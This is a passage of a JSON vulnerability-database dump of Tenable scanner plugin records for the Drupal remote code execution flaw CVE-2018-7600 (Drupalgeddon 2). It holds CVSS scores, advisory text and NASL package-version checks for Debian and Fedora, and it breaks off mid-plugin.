"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700224.PRM", "href": "https://www.tenable.com/plugins/nnm/700224", "sourceData": "Binary data 700224.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:43:23", "description": "Jasper Mattsson found a remote code execution vulnerability in the Drupal content management system. 
This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nFor further information please refer to the official upstream advisory at https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1325.NASL", "href": "https://www.tenable.com/plugins/nessus/108695", "sourceData": "#%NASL_MIN_LEVEL 
70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1325-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108695);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Debian DLA-1325-1 : drupal7 security update (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result\nin the site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/drupal7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:29", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.1.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98568", "href": "https://www.tenable.com/plugins/was/98568", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:51", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.2.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98567", "href": "https://www.tenable.com/plugins/was/98567", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:59", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98570", "href": "https://www.tenable.com/plugins/was/98570", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:49", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.0.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98569", "href": 
"https://www.tenable.com/plugins/was/98569", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:51", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98564", "href": "https://www.tenable.com/plugins/was/98564", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:38", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote 
code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.6 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98565", "href": "https://www.tenable.com/plugins/was/98565", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:34", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. 
This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nNote: This has been detected using an active check and should be remediated immediately. Because the flaw is exploitable without authentication and has been exploited in the wild, a positive result should also trigger a compromise assessment of the host, not only patching.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-22T00:00:00", "type": "nessus", "title": "Drupal < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-09-07T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_98216", "href": "https://www.tenable.com/plugins/was/98216", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-07T14:20:41", "description": "The Drupal CMS installed on the remote host is affected by a remote command execution vulnerability. 
A remote, unauthenticated attacker can leverage this issue to execute arbitrary commands on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "type": "nessus", "title": "Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_CVE-2018-7600_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/109041", "sourceData": "Binary data drupal_CVE-2018-7600_rce.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:16", "description": "- [8.4.6](https://www.drupal.org/project/drupal/releases/8.4.6)\n\n - [SA-CORE-2018-002 (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002)\n\n - [8.4.5](https://www.drupal.org/project/drupal/releases/8.4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 / CVE-2017-6930 / CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n - [8.4.4](https://www.drupal.org/project/drupal/releases/8.4.4)\n\n - 
[8.4.3](https://www.drupal.org/project/drupal/releases/8.4.3)\n\n - [8.4.2](https://www.drupal.org/project/drupal/releases/8.4.2)\n\n - [8.4.1](https://www.drupal.org/project/drupal/releases/8.4.1)\n\n - [8.4.0](https://www.drupal.org/project/drupal/releases/8.4.0)\n\n - [8.4.0-rc2](https://www.drupal.org/project/drupal/releases/8.4.0-rc2)\n\n - [8.4.0-rc1](https://www.drupal.org/project/drupal/releases/8.4.0-rc1)\n\n - [8.4.0-beta1](https://www.drupal.org/project/drupal/releases/8.4.0-beta1)\n\n - [8.4.0-alpha1](https://www.drupal.org/project/drupal/releases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", 
"CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-906BA26B4D.NASL", "href": "https://www.tenable.com/plugins/nessus/120615", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-906ba26b4d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120615);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2017-6926\",\n \"CVE-2017-6927\",\n \"CVE-2017-6930\",\n \"CVE-2017-6931\",\n \"CVE-2018-7600\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-906ba26b4d\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"-\n [8.4.6](https://www.drupal.org/project/drupal/releases/8\n .4.6)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.4.5](https://www.drupal.org/project/drupal/releases/8\n .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n -\n [8.4.4](https://www.drupal.org/project/drupal/releases/8\n .4.4)\n\n -\n [8.4.3](https://www.drupal.org/project/drupal/releases/8\n .4.3)\n\n -\n [8.4.2](https://www.drupal.org/project/drupal/releases/8\n .4.2)\n\n -\n [8.4.1](https://www.drupal.org/project/drupal/releases/8\n .4.1)\n\n -\n [8.4.0](https://www.drupal.org/project/drupal/releases/8\n .4.0)\n\n -\n 
[8.4.0-rc2](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc2)\n\n -\n [8.4.0-rc1](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc1)\n\n -\n [8.4.0-beta1](https://www.drupal.org/project/drupal/rele\n ases/8.4.0-beta1)\n\n -\n [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel\n eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-906ba26b4d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2018/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
